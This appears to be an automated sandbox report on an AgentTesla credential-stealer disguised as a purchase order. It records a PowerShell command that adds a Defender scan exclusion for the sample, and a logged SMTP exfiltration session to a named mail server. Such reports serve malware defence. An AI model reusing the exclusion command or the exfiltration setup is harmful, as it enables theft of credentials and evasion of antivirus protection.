                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1172
                                                Entropy (8bit):5.354777075714867
                                                Encrypted:false
                                                SSDEEP:24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
                                                MD5:F614CCA1D985910D63FFFF70966F53F5
                                                SHA1:A9BD00A65E13088BD96A2420E289487CD07D9D4C
                                                SHA-256:3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
                                                SHA-512:AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aa3ncavf.zhi.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqvapdi5.4ez.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3phy5qo.2xj.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjxw10nb.fvq.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.709321235727874
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:PURCHASE ORDER-6350-2024.exe
                                                File size:628'736 bytes
                                                MD5:e25b8037dca1fdb8e69cb26bd1cb4f17
                                                SHA1:5a05ef1979ba60a139cb987e7ab3abf1115acba8
                                                SHA256:42db38678ebdd31dbcab40014ff3b96a8b263f77e8484901226defbdfbb8eba6
                                                SHA512:24e783563daf3595dc341c080103976c1a9303f1e7a40418581e5abbb88ace04c341217c7d165e6f36fccd2800108efe454fb6a7acca127a1f8de8b0e2b7f4c1
                                                SSDEEP:12288:UnCgemEOtMBeSoLZTglM5L/O9PVRcVyZIPaCby:qlEj2LZd0tSVjby
                                                TLSH:72D40168165AE603C9A6A7B41A71F5B417780EEEB042D31B9FDC6DEBB967F104C081C3
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,...............0.................. ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x49acc2
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xC32C0DAC [Thu Oct 5 15:50:04 2073 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9ac6e0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x5cc.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x986000x70.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x98cc80x98e00f85ffb37abcf8fb7ac1b11ccdd15a555False0.9007004420482421data7.717897542519251IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x9c0000x5cc0x600313b5ba415a44557748a2eb5071f1305False0.4290364583333333data4.138499463618535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x9e0000xc0x200e2ff20f852323764479f73844ab847fcFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x9c0900x33cdata0.42995169082125606
                                                RT_MANIFEST0x9c3dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-08T13:52:51.176172+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549707199.79.62.115587TCP
                                                2024-10-08T13:52:51.176172+02002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.549707199.79.62.115587TCP
                                                2024-10-08T13:52:51.176172+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549707199.79.62.115587TCP
                                                2024-10-08T13:53:00.382718+02002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549707199.79.62.115587TCP
                                                2024-10-08T13:53:00.382718+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549707199.79.62.115587TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 8, 2024 13:52:58.592159033 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:52:58.597326040 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:58.597412109 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:52:59.278101921 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:59.279000044 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:52:59.284130096 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:59.436537981 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:59.447594881 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:52:59.452935934 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:59.604739904 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:59.609920025 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:52:59.614926100 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:59.891848087 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:52:59.892194986 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:52:59.897082090 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.047945976 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.048176050 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:53:00.053730965 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.225706100 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.225895882 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:53:00.230835915 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.382008076 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.382658005 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:53:00.382718086 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:53:00.382740021 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:53:00.382761002 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:53:00.387487888 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.387502909 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.387727022 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.387742043 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.643548012 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:53:00.691499949 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:54:38.128278971 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:54:38.133673906 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:54:38.485599041 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:54:38.485651016 CEST58749707199.79.62.115192.168.2.5
                                                Oct 8, 2024 13:54:38.485728025 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:54:38.485817909 CEST49707587192.168.2.5199.79.62.115
                                                Oct 8, 2024 13:54:38.491192102 CEST58749707199.79.62.115192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 8, 2024 13:52:58.115422010 CEST5837853192.168.2.51.1.1.1
                                                Oct 8, 2024 13:52:58.543736935 CEST53583781.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 8, 2024 13:52:58.115422010 CEST192.168.2.51.1.1.10x8ee9Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 8, 2024 13:52:58.543736935 CEST1.1.1.1192.168.2.50x8ee9No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false

                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Oct 8, 2024 13:52:59.278101921 CEST58749707199.79.62.115192.168.2.5220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Tue, 08 Oct 2024 17:22:59 +0530
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Oct 8, 2024 13:52:59.279000044 CEST49707587192.168.2.5199.79.62.115EHLO 932923
                                                Oct 8, 2024 13:52:59.436537981 CEST58749707199.79.62.115192.168.2.5250-md-54.webhostbox.net Hello 932923 [8.46.123.33]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Oct 8, 2024 13:52:59.447594881 CEST49707587192.168.2.5199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                Oct 8, 2024 13:52:59.604739904 CEST58749707199.79.62.115192.168.2.5334 UGFzc3dvcmQ6
                                                Oct 8, 2024 13:52:59.891848087 CEST58749707199.79.62.115192.168.2.5235 Authentication succeeded
                                                Oct 8, 2024 13:52:59.892194986 CEST49707587192.168.2.5199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                Oct 8, 2024 13:53:00.047945976 CEST58749707199.79.62.115192.168.2.5250 OK
                                                Oct 8, 2024 13:53:00.048176050 CEST49707587192.168.2.5199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                Oct 8, 2024 13:53:00.225706100 CEST58749707199.79.62.115192.168.2.5250 Accepted
                                                Oct 8, 2024 13:53:00.225895882 CEST49707587192.168.2.5199.79.62.115DATA
                                                Oct 8, 2024 13:53:00.382008076 CEST58749707199.79.62.115192.168.2.5354 Enter message, ending with "." on a line by itself
                                                Oct 8, 2024 13:53:00.382761002 CEST49707587192.168.2.5199.79.62.115.
                                                Oct 8, 2024 13:53:00.643548012 CEST58749707199.79.62.115192.168.2.5250 OK id=1sy8lw-000v2V-0y
                                                Oct 8, 2024 13:54:38.128278971 CEST49707587192.168.2.5199.79.62.115QUIT
                                                Oct 8, 2024 13:54:38.485599041 CEST58749707199.79.62.115192.168.2.5221 md-54.webhostbox.net closing connection

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:07:52:53
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0x680000
                                                File size:628'736 bytes
                                                MD5 hash:E25B8037DCA1FDB8E69CB26BD1CB4F17
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0x920000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0x100000
                                                File size:628'736 bytes
                                                MD5 hash:E25B8037DCA1FDB8E69CB26BD1CB4F17
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0xa00000
                                                File size:628'736 bytes
                                                MD5 hash:E25B8037DCA1FDB8E69CB26BD1CB4F17
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:11.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:117
                                                  Total number of Limit Nodes:9
                                                  execution_graph 47613 6dc7c4f 47614 6dc7c11 47613->47614 47615 6dc7c53 GetSystemMetrics 47613->47615 47616 6dc7cc8 GetSystemMetrics 47615->47616 47617 6dc7cc1 47615->47617 47618 6dc7cfb 47616->47618 47617->47616 47619 10ed7a8 DuplicateHandle 47620 10ed83e 47619->47620 47668 10e4668 47669 10e467f 47668->47669 47673 10e468b 47669->47673 47674 10e4788 47669->47674 47671 10e46b6 47679 10e4204 47673->47679 47675 10e47ad 47674->47675 47683 10e4888 47675->47683 47687 10e4898 47675->47687 47680 10e420f 47679->47680 47695 10e5c94 47680->47695 47682 10e7110 47682->47671 47685 10e48bf 47683->47685 47684 10e499c 47684->47684 47685->47684 47691 10e4514 47685->47691 47689 10e48bf 47687->47689 47688 10e499c 47688->47688 47689->47688 47690 10e4514 CreateActCtxA 47689->47690 47690->47688 47692 10e5928 CreateActCtxA 47691->47692 47694 10e59eb 47692->47694 47696 10e5c9f 47695->47696 47699 10e5cb4 47696->47699 47698 10e721d 47698->47682 47700 10e5cbf 47699->47700 47703 10e5ce4 47700->47703 47702 10e72fa 47702->47698 47704 10e5cef 47703->47704 47707 10e5d14 47704->47707 47706 10e73ed 47706->47702 47708 10e5d1f 47707->47708 47710 10e86eb 47708->47710 47713 10ead99 47708->47713 47709 10e8729 47709->47706 47710->47709 47717 10ece80 47710->47717 47722 10eadc0 47713->47722 47726 10eadd0 47713->47726 47714 10eadae 47714->47710 47718 10eceb1 47717->47718 47719 10eced5 47718->47719 47734 10ed448 47718->47734 47738 10ed439 47718->47738 47719->47709 47723 10eadd0 47722->47723 47729 10eaeb8 47723->47729 47724 10eaddf 47724->47714 47728 10eaeb8 GetModuleHandleW 47726->47728 47727 10eaddf 47727->47714 47728->47727 47730 10eaefc 47729->47730 47731 10eaed9 47729->47731 47730->47724 47731->47730 47732 10eb100 GetModuleHandleW 47731->47732 47733 10eb12d 47732->47733 47733->47724 47735 10ed455 47734->47735 47736 10ed48f 47735->47736 47742 10ed034 47735->47742 47736->47719 47739 10ed455 47738->47739 47740 10ed48f 47739->47740 47741 10ed034 GetModuleHandleW 47739->47741 47740->47719 47741->47740 47743 10ed039 47742->47743 47745 10edda0 47743->47745 47746 10ed15c 47743->47746 47745->47745 47747 10ed167 47746->47747 47748 10e5d14 GetModuleHandleW 47747->47748 47749 10ede0f 47748->47749 47749->47745 47632 6dc2780 47633 6dc278e 47632->47633 47634 6dc279f 47633->47634 47635 6dc2814 47633->47635 47638 6dc1584 GetDoubleClickTime 47634->47638 47648 6dc1584 47635->47648 47639 6dc27b4 47638->47639 47642 6dc15a4 GetDoubleClickTime 47639->47642 47643 6dc27d4 47642->47643 47644 6dc1584 GetDoubleClickTime 47643->47644 47645 6dc27ed 47644->47645 47646 6dc15a4 GetDoubleClickTime 47645->47646 47647 6dc2802 47646->47647 47650 6dc158f 47648->47650 47649 6dc281b 47652 6dc15a4 47649->47652 47650->47649 47656 6dc160c 47650->47656 47654 6dc15af 47652->47654 47653 6dc282d 47654->47653 47655 6dc160c GetDoubleClickTime 47654->47655 47655->47653 47657 6dc1617 47656->47657 47660 6dc296f 47657->47660 47658 6dc2949 47658->47649 47661 6dc2981 47660->47661 47662 6dc299e 47661->47662 47664 6dc2bd1 47661->47664 47662->47658 47665 6dc2c28 GetDoubleClickTime 47664->47665 47667 6dc2bba 47664->47667 47666 6dc2c5c 47665->47666 47666->47662 47667->47662 47621 6dd9ef0 47624 6dd9f1e 47621->47624 47622 6dd9fa9 47624->47622 47625 6dd88a8 47624->47625 47626 6dd88b3 47625->47626 47628 6dda0b0 47626->47628 47629 6dd88d8 47626->47629 47628->47622 47630 6dda200 SetTimer 47629->47630 47631 6dda26c 47630->47631 47631->47628 47750 10ed560 47751 10ed5a6 GetCurrentProcess 47750->47751 47753 10ed5f8 GetCurrentThread 47751->47753 47754 10ed5f1 47751->47754 47755 10ed635 GetCurrentProcess 47753->47755 47756 10ed62e 47753->47756 47754->47753 47757 10ed66b 